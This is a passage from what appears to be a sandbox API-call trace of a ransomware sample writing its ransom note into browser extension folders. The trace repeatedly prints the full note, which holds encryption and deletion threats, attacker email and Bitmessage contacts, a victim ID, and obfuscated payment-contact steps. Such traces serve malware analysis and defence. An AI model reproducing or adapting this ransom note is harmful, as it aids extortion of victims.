g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.552] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.553] CloseHandle (hObject=0x2c8) returned 1 [0278.553] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0278.553] GetLastError () returned 0x2 [0278.553] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 